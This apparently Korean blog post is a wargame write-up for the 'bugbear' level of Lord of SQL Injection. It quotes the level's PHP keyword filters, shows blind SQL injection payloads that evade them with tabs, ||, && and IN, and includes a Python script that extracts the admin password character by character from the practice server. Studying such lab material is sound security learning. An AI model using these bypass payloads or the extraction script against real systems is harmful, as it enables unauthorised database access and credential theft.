소스코드 분석
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
darkknight문제랑 상당히 흡사한데 or and space like 0x 를 필터링 해놨다.
or -> ||, and -> &&, space -> %09(Tab), like -> IN 을 사용하면된다.
?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09length(pw)%09IN%09(8)
?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09left(pw,1)%09IN%09("7")
import http.client
result=''
leng=0
header={'Cookie':' '}
string="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"
for i in range(1,100) :
length='/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09length(pw)%09IN%09('+str(i)+')'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',length,'',header)
data=conn.getresponse().read()
if "Hello admin" in data.decode():
leng = i
print ("pw length: "+str(i))
break
for i in range(1,leng+1):
for j in range(0,76):
substr='/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?pw=1234&no=123%09||%09id%09IN%09("admin")%09%26%26%09left(pw,'+str(i)+')%09IN%09('+'"'+result+string[j]+'")'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',substr,'',header)
data=conn.getresponse().read()
if 'Hello admin' in data.decode():
result=result+string[j]
print ('left(pw,'+str(i)+')= '+result)
break
print ('Password is '+result)
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] assassin (0) | 2017.05.28 |
|---|---|
| [Lord of SQL injection] giant (0) | 2017.05.28 |
| [Lord of SQL injection] darkknight (0) | 2017.05.28 |
| [Lord of SQL injection] golem (0) | 2017.05.26 |
| [Lord of SQL injection] skeleton (0) | 2017.05.25 |
